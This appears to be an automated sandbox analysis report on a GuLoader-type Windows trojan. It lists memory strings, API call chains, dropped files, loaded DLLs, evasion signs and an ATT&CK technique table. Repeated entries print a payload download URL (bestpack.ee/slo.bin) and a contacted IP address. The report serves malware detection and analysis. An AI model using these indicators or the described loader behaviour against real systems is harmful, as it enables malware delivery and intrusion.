      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486344040.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419467345.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74623047904.00000000066B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/-end-point:
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72232647774.00000000066B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, 
String found in binary or memory: https://bestpack.ee/5
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/CI
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/a
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/hI
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/oI
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.bin
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.bin$
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.bin.R
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.bin/
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.bin7
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.bin=R
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binB
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binG
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binR
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binW
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binYR
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binh
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binked
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/slo.binmR
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://bestpack.ee/tpack.ee/-end-point:
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe String found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: unknown HTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49761 version: TLS 1.2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Code function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Code function: 0_2_00406C3F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Code function: 0_2_70591BFF
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000000.00000000.71623775698.000000000044C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamenygifte.exe4 vs SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000000.71907439558.000000000044C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamenygifte.exe4 vs SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal60.troj.evad.winEXE@3/9@1/1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Code function: 0_2_00404991 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Code function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe File created: C:\Users\user\polaritets
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe File created: C:\Users\user\AppData\Local\Temp\nsr7DD9.tmp
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe ReversingLabs: Detection: 50%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
      Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      Source: Yara matchFile source: 00000002.00000002.76719471404.0000000003592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.72566552229.0000000006D62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_70591BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70591BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_705930C0 push eax; ret 0_2_705930EE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeFile created: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI/Special instruction interceptor: Address: 73F9C1E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI/Special instruction interceptor: Address: 3C29C1E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe TID: 1540Thread sleep count: 31 > 30Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe TID: 1540Thread sleep time: -310000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144773492.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192333805.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372413154.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737216556.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532927856.00000000066BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI call chain: ExitProcess graph end nodegraph_0-4915
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI call chain: ExitProcess graph end nodegraph_0-4913
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00401774 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401774
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_70591BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70591BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      Source | Detection | Scanner | Label | Link
      SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe | 50% | ReversingLabs | Win32.Trojan.GuLoader
      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll | 0% | ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
